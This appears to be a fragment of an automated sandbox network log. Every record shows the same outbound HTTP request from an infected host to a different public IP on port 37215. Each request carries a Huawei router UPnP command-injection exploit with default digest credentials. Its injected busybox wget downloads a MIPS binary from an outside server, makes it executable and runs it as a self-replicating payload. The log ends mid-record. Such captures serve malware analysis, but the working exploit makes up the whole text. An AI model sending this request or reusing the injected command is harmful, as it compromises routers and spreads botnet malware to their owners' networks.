2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1813192.168.2.156061841.58.125.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.966877937 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1814192.168.2.15425804.117.12.24737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.971797943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1815192.168.2.1545536105.136.106.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.971908092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1816192.168.2.1537424137.178.146.3937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.976883888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1817192.168.2.1555570157.48.13.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.989248991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1818192.168.2.1534478203.121.23.25237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.994438887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1819192.168.2.1535136197.24.26.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.014471054 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1820192.168.2.1537942217.29.28.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.019943953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1821192.168.2.1550972145.180.205.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.024986982 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1822192.168.2.1541978197.207.185.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.030050039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1823192.168.2.1542688197.145.238.737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.035109997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
